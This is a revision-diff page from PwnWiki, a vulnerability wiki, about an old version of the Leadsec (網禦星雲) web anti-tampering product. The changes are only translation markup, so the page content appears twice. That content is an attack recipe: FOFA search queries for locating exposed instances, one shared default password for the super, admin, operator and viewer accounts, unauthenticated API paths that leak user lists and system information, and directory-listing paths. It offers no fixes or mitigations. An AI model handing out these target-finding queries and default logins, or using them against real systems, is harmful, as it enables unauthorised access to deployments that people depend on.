Difference between revisions of "網禦星雲-網頁防篡改系統古老版本多個漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==影響版本== 網禦星云網頁防篡改系統較古老的版本 </translate> ==FOFA== <pre> title = "网御web应用安全防护系统v3.0" ti...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==影響版本== | + | ==影響版本== <!--T:1--> |
| + | <!--T:2--> | ||
網禦星云網頁防篡改系統較古老的版本 | 網禦星云網頁防篡改系統較古老的版本 | ||
</translate> | </translate> | ||
| Line 13: | Line 14: | ||
<translate> | <translate> | ||
| − | ==弱口令== | + | ==弱口令== <!--T:3--> |
super(超級管理員) | super(超級管理員) | ||
| + | <!--T:4--> | ||
admin(系統管理員) | admin(系統管理員) | ||
| + | <!--T:5--> | ||
operator(操作員) | operator(操作員) | ||
| + | <!--T:6--> | ||
viewer(審查員) | viewer(審查員) | ||
| + | <!--T:7--> | ||
密碼都是:Admin%100 | 密碼都是:Admin%100 | ||
</translate> | </translate> | ||
<translate> | <translate> | ||
| − | ==未授權信息泄漏== | + | ==未授權信息泄漏== <!--T:8--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 32: | Line 37: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| − | ==帳號信息泄漏== | + | ==帳號信息泄漏== <!--T:9--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 38: | Line 43: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| − | ==系統信息泄漏== | + | ==系統信息泄漏== <!--T:10--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 44: | Line 49: | ||
</pre> | </pre> | ||
<translate> | <translate> | ||
| − | ==目錄遍歷== | + | ==目錄遍歷== <!--T:11--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 54: | Line 59: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:12--> |
</translate> | </translate> | ||
https://short.pwnwiki.org/?c=WtUWOp | https://short.pwnwiki.org/?c=WtUWOp | ||
Latest revision as of 09:13, 10 June 2021
影響版本
網禦星云網頁防篡改系統較古老的版本
FOFA
title = "网御web应用安全防护系统v3.0" title = "网页防篡改系统"
弱口令
super(超級管理員)
admin(系統管理員)
operator(操作員)
viewer(審查員)
密碼都是:Admin%100
未授權信息泄漏
URL+/API/
帳號信息泄漏
URL+/API/user/list
系統信息泄漏
URL+/API/system_info/list
目錄遍歷
URL+/doc/ URL+/images/ URL+/audio/ URL+/fonts/